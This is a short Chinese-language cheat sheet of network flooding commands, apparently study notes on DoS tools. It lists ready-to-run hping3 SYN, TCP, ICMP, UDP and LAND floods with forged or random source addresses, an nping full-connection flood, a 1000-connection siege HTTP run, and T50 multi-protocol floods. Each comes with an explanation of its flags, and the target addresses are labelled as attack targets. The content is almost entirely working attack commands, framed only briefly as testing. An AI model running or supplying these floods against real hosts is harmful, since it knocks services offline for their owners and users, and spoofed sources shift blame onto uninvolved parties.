Hping3
几乎可以定制发送任何tcp/ip数据包,用于测试fw,端口扫描,性能测试
1 Syn Flood 2 – hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 1.1.1.1 //一条命令搞定 3 -c 计数器,多次数据包 -d 数据包多大 -S syn包 -p 目标攻击端口 --flood泛洪方式 4 --rand-source:随机源地址 1.1.1.1 攻击的目标 5 6 另外一种组合: 7 – hping3 -S -P -U -p 80 --flood --rand-source 1.1.1.1 8 9 TCP Flood攻击: 10 – hping3 -SARFUP -p 80 --flood --rand-source 1.1.1.1 11 -SARFUP标记类全标记满 12 13 ICMP Flood攻击 14 – hping3 -q -n -a 1.1.1.1 --icmp -d 56 --flood 1.1.1.2 15 -q:安静模式 -n:不作域名解析 -a:伪造源地址 16 17 ▪ UDP Flood 18 – hping3 -a 1.1.1.1 --udp -s 53 -d 100 -p 53 --flood 1.1.1.2 19 -s:指定源端口,不指定也可以 20 21 LAND攻击 22 – 伪造源地址和目标地址都是自己,造成自己打自己 23 – hping3 -n -a 1.1.1.1 -S -d 100 -p 80 --flood 1.1.1.1
nping
TCP全链接DoS攻击
– nping --tcp-connect --rate=10000 -c 1000000000 -q 192.168.33.135
--tcp-connect:建立tcp连接 --rate=10000:速率一万个
Siege
– http/https 压力测试
– siege -i -c 1000 http://1.1.1.1/a.php -A htttttp
-c 1000个并发连接
-A 自定义http头,随便写都可以
– 同时攻击多个url,-f 使用字典
▪ /etc/siege/urls.txt
▪ T50
– t50 1.1.1.1 --flood --turbo -S --protocol TCP --dport 80
– t50 1.1.1.1 --flood --turbo -S TCP UDP OSPF EIGRP --dport 22